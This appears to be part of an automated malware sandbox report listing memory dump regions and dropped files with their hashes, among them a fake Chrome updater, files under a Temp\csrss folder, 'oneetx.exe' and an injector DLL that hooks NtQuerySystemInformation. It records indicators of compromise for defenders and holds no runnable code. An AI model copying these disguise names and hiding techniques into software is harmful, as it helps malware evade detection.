memory/2396-537-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1660-563-0x0000000000400000-0x00000000008DF000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

C:\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Program Files\Google\Libs\g.log

MD5 fdba80d4081c28c65e32fff246dc46cb
SHA1 74f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256 b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512 b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

memory/628-604-0x00007FF7A8F60000-0x00007FF7A931D000-memory.dmp

memory/4016-605-0x00000208C2390000-0x00000208C23B0000-memory.dmp

memory/2396-607-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/4916-611-0x00007FF65AA10000-0x00007FF65AA26000-memory.dmp

memory/4016-612-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp

memory/2396-613-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/4016-617-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp

memory/2396-618-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1660-620-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/4016-623-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp

memory/2396-624-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

memory/2396-632-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1660-633-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/4016-636-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Roaming\ugrceei

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

C:\Users\Admin\AppData\Roaming\ugrceei

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

C:\Users\Admin\AppData\Roaming\ugrceei

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

MD5 09031a062610d77d685c9934318b4170
SHA1 880f744184e7774f3d14c1bb857e21cc7fe89a6d
SHA256 778bd69af403df3c4e074c31b3850d71bf0e64524bea4272a802ca9520b379dd
SHA512 9a276e1f0f55d35f2bf38eb093464f7065bdd30a660e6d1c62eed5e76d1fb2201567b89d9ae65d2d89dc99b142159e36fb73be8d5e08252a975d50544a7cda27